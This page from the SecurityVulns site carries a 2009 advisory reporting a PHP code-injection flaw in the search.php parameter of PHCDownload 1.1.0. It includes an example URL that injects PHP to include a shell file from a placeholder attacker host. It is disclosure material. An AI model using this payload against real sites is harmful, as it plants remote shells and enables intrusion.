Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  New Cross-Site Scripting vulnerability in Drupal

  Cross-Site Scripting vulnerability in Drupal

  Cross-Site Scripting vulnerability in Drupal

From:contact_(at)_vnbrain.net <contact_(at)_vnbrain.net>
Date:20 февраля 2009 г.
Subject:PHCDownload 1.1.0 Vulnerabilities

A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called.

Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>

Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород